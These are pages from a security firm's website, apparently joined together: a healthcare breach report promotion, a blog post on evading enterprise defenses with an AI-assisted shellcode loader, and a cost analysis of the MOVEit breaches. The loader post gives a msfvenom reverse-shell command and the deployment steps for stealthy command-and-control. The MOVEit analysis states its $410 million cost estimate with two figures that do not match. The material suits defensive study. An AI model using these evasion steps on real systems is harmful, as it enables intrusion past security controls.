Includes Incidents Affecting 500 or More Records Containing Protected Health Information (PHI)
Explore a comprehensive analysis of breach patterns, financial impacts, and emerging cybersecurity risks within the healthcare sector.
This report shares healthcare breach data to provide context and insight that may assist cybersecurity leaders in ongoing decision-making efforts.
ACCESS THE REPORT
Why this report matters
Healthcare remains one of the most targeted industries, yet the drivers behind breaches continue to evolve rapidly. This report provides clear, data-backed insights that help security leaders understand current trends and make informed decisions with confidence.
CISOs, CIOs, compliance teams, MSPs, security analysts, and any leader who needs clean, actionable intelligence to guide cybersecurity decisions.
After you submit
You’ll get instant access to the full 2025 Healthcare Data Breach Trends & Insights Report.
Key Report Highlights
Discover the essential insights and trends that are shaping the future of healthcare cybersecurity. Our report offers a comprehensive analysis of breach patterns, financial impacts, and emerging risks.
In-Depth Analysis
Explore detailed data on breach trends, PHI exposure, and third-party risks, curated from national sources over the past decade.
Expert Recommendations
Benefit from expert advice on addressing top vulnerabilities and strengthening resilience against real-world attacks. Stern Security has extensive experience in the healthcare industry, is the winner of the NC Tech Cyber Award, is SOC 2 Type 2 certified, and has been featured on numerous News platforms.
Actionable Insights
Gain practical steps to enhance your organization’s security posture and make informed decisions to mitigate risks effectively.
Recently, the Stern Security penetration testing team faced a challenge: bypassing some of the toughest enterprise security defenses available today. Among them was a product that claims 100% MITRE ATT&CK detection, protection, and prevention. Another claimed its multi-layered defensive strategy of pattern matching, behavior monitoring, networking access control lists and sandboxing could detect and prevent malware, Finally an EDR solution paired with “Next-Gen” Antivirus (NGAV).
Dubbing the attack “The Cyborg Bypass,” the Stern Security team used artificial intelligence (AI) to help create a custom loader executable. Combined with a default shellcode payload, this allowed us to successfully evade multiple layers of security—including SIEM, XDR, EDR, and AV solutions from major vendors.
The Security Landscape
Modern enterprises utilize layered security defenses. SIEM platforms collect, analyze and correlate logs to spot threats, trigger alerts and kickoff automation. XDR solutions provide comprehensive monitoring across devices and networks, and antivirus/EDR tools scan for known malware and suspicious behaviors and respond.
Common penetration testing payloads from tools like Metasploit and Cobalt Strike usually don’t stand a chance. Defenders have seen them a thousand times, and things like static signatures, behavior-based rules, or sandboxing catch them fast. This makes evasion a real challenge, even if you’re doing everything right.
Leveraging AI to Build a Custom Loader
To get around these defenses, the Stern Security penetration testing team used AI to help build a lightweight custom loader—we’ll call it loader.exe. This loader takes a raw, default shellcode payload (shellcode.bin) straight from disk—no obfuscation, no encryption—and executes it directly in memory. Instead of launching a typical executable payload, it keeps things simple and stealthy, avoiding many of the patterns that security tools are trained to detect.
Proof of Concept (POC)
The loader’s core function is to read the shellcode file into memory and execute it using Windows API calls – loader.cpp:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=8080 --platform windows -a x64 -f raw -o shellcode.bin
Deployment Process
Generate raw shellcode payload, we’ve tested both default MSF Venom and Cobalt Strike payloads – saved as shellcode.bin.
Compile the loader executable as above.
Transfer both loader.exe and shellcode.bin to the target machine.
Start the C2 listener.
Execute loader.exe on the target – This will load and run the shellcode in memory.
Establish a stealthy command and control (C2) connection, bypassing SIEM, XDR, and AV.
Understanding Execution and Disk Presence
During this process both the loader (loader.exe) and shellcode (shellcode.bin) are present on the target’s disk during runtime. While the shellcode exists as a file, it’s never executed directly. Instead, the loader reads contents of the shellcode file into memory and executes it from there. This method completely bypasses monitoring of traditional executable file formats.
This approach lowers the chance of detection, since many security tools prioritize monitoring for suspicious executables and process behavior—not just the presence of a file on disk. Surprisingly, even this simple technique was enough to slip past advanced defenses.
Key Takeaways
AI is quickly becoming a powerful asset in offensive security—not just for crafting exploits, but for evading detection altogether. To keep up, defenders should:
Don’t rely solely on signature-based detection: Traditional AV and even many “Next-Gen” tools often miss custom loaders and raw shellcode that don’t match known patterns.
Strengthen endpoint visibility: Ensure EDR/XDR solutions are configured to log and alert on suspicious in-memory execution—even when no binary is dropped.
Harden systems against loader-style malware: Monitor for uncommon API usage (like VirtualAlloc + execution), and block execution from temporary or user-controlled directories
Conclusion
The blend of AI-assisted tooling and custom payload loaders is raising the stakes for both attackers and defenders. Our ability to bypass enterprise-grade defenses—many of which claim to be impenetrable—highlights just how urgently cybersecurity needs to evolve.
Want to know how your defenses would hold up? Reach out to the Stern Security team to explore your current security posture and learn how real-world testing can help you stay ahead of advanced threats.
In 2023, Progress Software’s MOVEit file transfer application was the source of a dangerous zero-day vulnerability. Criminals that exploited this vulnerability were able to gain full access to the files on MOVEit servers. The research from Stern Security’s 2024 healthcare breach report showed that this MOVEit breach was the cause of 25.9% of the protected health information (PHI) lost last year. Quantifying the MOVEit 0-day’s impact on healthcare is essential to understanding the full extent of this vulnerability.
MOVEit Incident
Progress Software announced the critical vulnerability in their MOVEit software on May 31, 2023. Unfortunately, there was evidence that this vulnerability was already exploited by at least May 27, 2023. Eventually the Cl0p ransomware group claimed responsibility for this incident. The first healthcare breach due to the MOVEit 0-day was announced on June 11, 2023, and the last was on December 8, 2023. According to the 2024 Ponemon Data Breach report, the average number of days to discover a data breach was 258 days which makes it easier to understand why healthcare MOVEit breaches were still being reported so late in the year (192 days later).
Quantifying the Impact
By the end of the 2023, there were 42 healthcare breaches attributed to the MOVEit vulnerability. Thirty-one (31) of these breaches were from third-parties (business associates of the healthcare organization) and eleven (11) occurred at covered entity locations (healthcare organizations). These 42 breaches resulted in the exposure of 41,380,105 protected health information (PHI) records. While there were 708 total reported healthcare breaches last year, the 42 MOVEit breaches accounted for 25.9% of the PHI exposed!
Third-parties have a significant impact on breach costs. According to the 2024 Ponemon Breach Report, a third-party breach increases the breach cost by an average of $240,599. In 2023, most (73.8%) of the healthcare MOVEit breaches lost were from a third-party!
To quantify this impact, we will multiply the average breach cost in healthcare ($9,770,000) and 42 breaches attributed to this incident to get $410,430,000.
42 breaches x 9,770,000 = $410,340,000
The results show us that the MOVEit breach cost an estimated $410 million in losses! To put this number in prospective, this is roughly the amount that FEMA (Federal Emergency Management Agency) allocated to Puerto Rico’s recovery efforts from Hurricane Maria ($412 million). While this was a digital disaster as opposed to a natural disaster, the dollars figures were comparable.
Solutions to Reduce Risk
There are numerous protective measures that organizations can do to reduce the risk of another “MOVEit” incident.
Risk Analysis – Every organization should perform a thorough risk analysis to understand the organization’s susceptibility to the latest threats.
Patching – Immediately patch critical vulnerabilities, especially if the assets are exposed or contain sensitive information. In the case of MOVEit systems, these file transfer servers are generally exposed to the internet so immediately patching a critical flaw is essential.
Minimize Data – Organizations should only store the data necessary to complete their tasks. Once the data is no longer needed, secure store or dispose of the data. On file transfer servers such as MOVEit, organizations should immediately remove the transferred data after the use. The MOVEit servers should not be treated similar to file storage systems that permanently store data.
Penetration Testing – Controls should be tested for effectiveness in comprehensive penetration testing engagements.
Vulnerability Scanning – Vulnerability scanners should discover unpatched systems. Externally exposed systems such as file transfer servers should be scanned more frequently.
Limit Access – If a server does not need to be accessible to the entire internet, then limit access to the necessary sources and destinations. Firewall rules can greatly reduce the threat exposure of a system.
Third-Party Risk Management (TPRM)– Most of the MOVEit breaches involved third parties. It is critical to perform accurate third-party risk management especially if your third-parties have access to sensitive data such as Protected Health Information (PHI).
Conclusion
The MOVEit 0-day vulnerability was one of the most impactful vulnerabilities of all time. It cost the healthcare industry an estimated $410 million and exposed 41,380,105 protected health information (PHI) records. The financial impact is similar to the amount that FEMA allocated to Puerto Rico’s recovery efforts from Hurricane Maria. Performing cyber risk quantification on incidents provides the opportunity to show business impact in financial terms which is of the upmost importance to leadership. Utilizing quantifiable data can help organizations obtain the resources needed to protect their organizations.
Bibliography
Cost of a Data Breach Report 2024. (2024). Retrieved from IBM.com: https://www.ibm.com/reports/data-breach
FEMA Awards More than $412 Million in Additional Federal Grants for Puerto Rico. (2018, September 12). Retrieved from FEMA.gov: https://www.fema.gov/press-release/20230502/fema-awards-more-412-million-additional-federal-grants-puerto-rico
In its third annual healthcare data breach report, Stern Security has critically analyzed over 5,900 data breaches since the Department of Health and Human Services (HHS) began tracking the information in 2009. Stern Security utilized data from their HealthcareBreaches.com website as well as published information from HHS to create this comprehensive 2024 Velocity Healthcare Data Breach Report. Stern Security augmented the HHS data by investigating every breach in 2023 to fully understand the cause of the incident.
This report shows critical insights into healthcare breach trends over the past 14 years. It covers everything from the number of breaches attributed to ransomware to the number attributed to third-parties (business associates). This year, Stern Security has added a new breach categorization – the number of breaches due to the MOVEit file transfer software vulnerability. Review the report to see the significant impact that the MOVEit 0-day had on the healthcare industry. Once again, multiple breach milestones were set with more healthcare breaches occurring and more records exposed in 2023 than any previous year. This report puts forth the detailed analysis.
We sincerely thank our sponsors, Trend Micro and the Raleigh ISSA Chapter, whose contributions enable the ongoing pursuit of this important research and the free sharing of our findings.
Report
The full 2024 Velocity Healthcare Data Breach Report can be downloaded below.
If you enjoy the report below and would like to be informed of future reports and research, please fill out the mailing list info below. Don’t worry – we don’t send many emails.
In its second annual Velocity healthcare data breach report, Stern Security has critically analyzed over 5,000 data breaches since the Department of Health and Human Services (HHS) began tracking the information in 2009. Stern Security utilized data from their HealthcareBreaches.com website as well as published information from HHS to create this comprehensive study. Stern Security augmented the HHS data by investigating each breach in 2022 to fully understand the cause of the incident.
This report shows critical insights into healthcare breach trends over the past 13 years. It covers everything from the number of breaches attributed to ransomware to the number attributed to third-parties (business associates). This year, Stern Security has added a new breach categorization – the number of breaches due to analytics software including Meta (Facebook) Pixel. Once again, a new breach record was established with more healthcare breaches occurring in 2022 than any previous year. This report puts forth a detailed analysis.
In its first annual healthcare data breach report, Stern Security has critically analyzed over 4,000 data breaches since the Department of Health and Human Services began tracking the information in 2009. Stern Security utilized data from their HealthcareBreaches.com website as well as published information from Health and Human Services to create this comprehensive report.
This report shows thought-provoking insights into healthcare breach trends over the past 12 years. It covers everything from the number of breaches attributed to ransomware to third-party (business associate) breaches. More healthcare breaches occurred in 2021 than any other year and this report illustrates the detailed analysis.